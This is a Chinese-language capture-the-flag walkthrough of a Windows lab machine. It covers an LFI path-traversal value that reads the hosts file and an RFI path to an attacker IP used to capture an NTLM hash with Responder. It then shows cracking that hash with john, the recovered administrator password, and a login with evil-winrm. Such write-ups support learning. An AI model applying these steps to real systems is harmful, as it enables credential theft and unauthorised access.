使用 IP 地址訪問 Web 服務時,我們要重定向到的域是什么?


服務器上使用哪種腳本語言來生成網頁?

抓取回傳包判斷




用于加載網頁不同語言版本的 URL 引數的名稱是什么?
根據提示,切換語言,可以發現答案是page


“page”引數的以下哪一個值是利用本地檔案包含 (LFI) 漏洞的示例:“法語.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“, ”minikatz.exe”


“page”引數的以下哪一個值是利用遠程檔案包含 (RFI) 漏洞的示例:“法語.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“, ”minikatz.exe”


NTLM 代表什么?

我們在回應程式實用程式中使用哪個標志來指定網路介面?

administrator用戶的密碼是什么?
回答:badminton
首先啟動responder并監聽本地的tun0網卡,然后由于靶機存在RFI,因此可以遠程訪問本地的某個檔案,使用responder拿到主機的administrator的哈希,然后使用john破解
使用responder監聽本地tun0網卡
responder -I tun0




john 破解hash



我們將使用 Windows 服務(即在機器上運行)使用我們恢復的密碼遠程訪問回應程式計算機,它偵聽什么埠 TCP?


使用evil-winrm 進行登錄


轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/549583.html
標籤:其他
